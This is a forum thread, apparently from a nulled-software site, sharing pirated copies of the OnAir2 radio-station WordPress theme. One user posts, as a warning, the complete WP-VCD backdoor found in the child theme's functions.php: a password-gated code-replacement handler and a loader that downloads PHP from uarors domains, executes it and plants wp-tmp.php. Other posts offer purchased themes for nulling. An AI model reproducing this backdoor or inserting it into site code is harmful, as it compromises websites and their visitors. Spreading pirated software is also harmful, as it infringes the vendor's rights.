Onair2 v3.3.8 – Radio Station WordPress Theme

macrobert

Active member
Trusted Uploader
Nov 2, 2018
205
167
43
12406
Create now your radio station website! Compatible with all the major providers as ShoutCAST, IceCAST, Radio.co, Airtime and more! Schedule functions, radio player and anything else you need to create a super professional radio website in WordPress. OnAir2 is a complete set of tools for creating professional, mobile friendly radio station websites in a single WordPress theme. Including special functions as: non stop music player, popup player, shows schedule (weekly and monthly), banner and sponsor manager, members, radio shows, song charts and much more!
Build, Modify, Create
But don’t feel limited by all of these possibilities alone – because that’s just the tip of this iceberg.

OnAair2 is complemented and extended even further with the efficiency of a Page Builder. Create almost any web element you desire with the Drag & Drop simplicity of the #1 top selling Plugin for WordPress, Visual Composer.

  • Fast and responsive
  • 11 Post types
  • Shoutcast/Icecast player (requires public mp3 stream, contact us for pre purchase test)
  • Shoutcast V.2 Song Titles Feed
  • Popup player
  • 7 Custom widgets
  • Totally customizable in colors and fonts
  • Lots of shortcodes
  • Visual Composer included (some modules are dsabled as incompatible with ajax. We can reenable them if you need, disabling ajax plugin)
  • Show schedule with automatic sliders and “on air” show info
  • Working contacts page with form and map
  • Ajax capabilities
  • Pixel perfect design
OnAir2 V3 is out!
Including latest Revolution Slider, WooCommerce support, Give Donation support, new shortcodes, top bar player and more! WP 5 ready!

Please note this theme is not for WP Multisite.
Copyright
Every JS library used in the project is GPL or GNU. Details in the manual. Images are not part of the product nor included in the demo installations
Changelog
Version 3.3.8 [2019 April 03]
[x] IMPROVED page Builder ajax compatibility for video backgrounds
[x] REMOVED Google+ sharing
[x] ADDED LinkedIn sharing
[x] ADDED Whatsapp sharing
[x] REMOVED sharing shortcode tooltip as was not fitting and is useless
Demo


Dwonload Onair2 v3.3.8 – Radio Station WordPress Theme
 

keran

Active member
Nov 7, 2018
242
114
43
12406
Create now your radio station website! Compatible with all the major providers as ShoutCAST, IceCAST, Radio.co, Airtime and more! Schedule functions, radio player and anything else you need to create a super professional radio website in WordPress. OnAir2 is a complete set of tools for creating professional, mobile friendly radio station websites in a single WordPress theme. Including special functions as: non stop music player, popup player, shows schedule (weekly and monthly), banner and sponsor manager, members, radio shows, song charts and much more!
Build, Modify, Create
But don’t feel limited by all of these possibilities alone – because that’s just the tip of this iceberg.

OnAair2 is complemented and extended even further with the efficiency of a Page Builder. Create almost any web element you desire with the Drag & Drop simplicity of the #1 top selling Plugin for WordPress, Visual Composer.

  • Fast and responsive
  • 11 Post types
  • Shoutcast/Icecast player (requires public mp3 stream, contact us for pre purchase test)
  • Shoutcast V.2 Song Titles Feed
  • Popup player
  • 7 Custom widgets
  • Totally customizable in colors and fonts
  • Lots of shortcodes
  • Visual Composer included (some modules are dsabled as incompatible with ajax. We can reenable them if you need, disabling ajax plugin)
  • Show schedule with automatic sliders and “on air” show info
  • Working contacts page with form and map
  • Ajax capabilities
  • Pixel perfect design
OnAir2 V3 is out!
Including latest Revolution Slider, WooCommerce support, Give Donation support, new shortcodes, top bar player and more! WP 5 ready!

Please note this theme is not for WP Multisite.
Copyright
Every JS library used in the project is GPL or GNU. Details in the manual. Images are not part of the product nor included in the demo installations
Changelog
Version 3.3.8 [2019 April 03]
[x] IMPROVED page Builder ajax compatibility for video backgrounds
[x] REMOVED Google+ sharing
[x] ADDED LinkedIn sharing
[x] ADDED Whatsapp sharing
[x] REMOVED sharing shortcode tooltip as was not fitting and is useless
Demo


Dwonload Onair2 v3.3.8 – Radio Station WordPress Theme

Hi bro, can u update to 3.3.9?
Thanks
 

aris

New member
Dec 14, 2018
10
2
3
I have found a virus
Tell us where you got this template!!!!


in the functions.php from the template onair2-child

looks the same on Reddit.com

//here is the evil code
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '3341f2abdbafb77b834dad3218823ee7'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(FILE))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(FILE, $file);
print "true";
}


}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(FILE))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(FILE, $file);
print "true";
}


}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}








$div_code_name = "wp_vcd";
$funcfile = FILE;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}


$wp_auth_key='b5fb868f763a8b37af50c49c4bfef3ca';
if (($tmpcontent = @file_get_contents("http://www.uarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.uarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("http://www.uarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.uarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}





}
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>



// the normal functions.php file starts

<?php
/**
  • OnAir2 Child theme
  • custom functions.php file
*/

/**
* Add parent and child stylesheets
*/
add_action( 'wp_enqueue_scripts', 'qantumthemes_child_enqueue_styles' );
if(!function_exists('qantumthemes_child_enqueue_styles')) {
function qantumthemes_child_enqueue_styles() {
wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' );
wp_enqueue_style( 'child-style', get_stylesheet_uri() );
}}

/**
* Upon activation flush the rewrite rules to avoid 404 on custom post types
*/
add_action( 'after_switch_theme', 'qantumthemes_child_rewrite_flush_child' );
if(!function_exists('qantumthemes_child_rewrite_flush_child')) {
function qantumthemes_child_rewrite_flush_child() {
flush_rewrite_rules();
}}


/**
* Setup Onair2 Child Theme's textdomain.
*
  • Declare textdomain for this child theme.
  • Translations can be filed in the /languages/ directory.
*/
function qantumthemes_child_theme_setup() {
load_child_theme_textdomain( 'onair2-child', get_stylesheet_directory() . '/languages' );
}
add_action( 'after_setup_theme', 'qantumthemes_child_theme_setup' );
 

468

Member
Nov 19, 2018
74
28
18
Still no response for this bad situation from the author of this upload...
If the "evil code' exist on this upload, Babiato must take a stand on this problem.
This "evil code" is a backdoor, spam ads popup, etc, named "WP-VCD" malware...
 
Last edited:

Saiis

Active member
Jul 29, 2019
156
46
28
The virus is pretty easy to clean out. you can do it manually or with the help of wordfence. The virus above places obfuscated code in a few places, will infect other sites on your hosting account, inserts a new user into your DB and eats up system resources. I've removed this from a few domains already in the last 2 years. Full whitepaper here. Wordfence (even the free version) will tell you every file that you need to look at or remove. For all of the files you don't remove, just edit the files and remove the section added to the tops of each (functions.php etc) including the long hash.
 
  • Like
Reactions: aris

marcelomm

New member
May 10, 2019
26
9
3
Hello Guys,

I have the original version (purchased at Envato). I could share here the original template to be nulled. What you think?
 

JustIrinel

New member
Sep 3, 2019
8
1
3
Hi.

You can attach the latest version ? I have a key but I dont have the account so I cant download latest version. Thanks!
 

marcelomm

New member
May 10, 2019
26
9
3
Hi. Its attached :)

You can attach the latest version ? I have a key but I dont have the account so I cant download latest version. Thanks!
 

Attachments

  • onair2-radio-station-wordpress-theme-wordpress-theme.zip
    4.8 MB · Views: 21

NullMaster

Well-known member
Null Master
Trusted Uploader
Jul 25, 2018
12,058
22,063
120
nulled but License required for plugins list.
 

Attachments

  • onair2.zip
    4.9 MB · Views: 47

marcelomm

New member
May 10, 2019
26
9
3
Do you have the demo files?
I´ve checked and the unique demo files that I have is for the slider template. But they have 200MB, I could update to you if is this that you want.

If is the demo to import to wordpress, if anyone have more knowledge, I could try extract from the server the demo files to upload here. :)

PS: I´ve attached the version of 15/12 :)
 

Attachments

  • themeforest-onair2-radio-station-wordpress-theme.zip
    5.1 MB · Views: 32

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu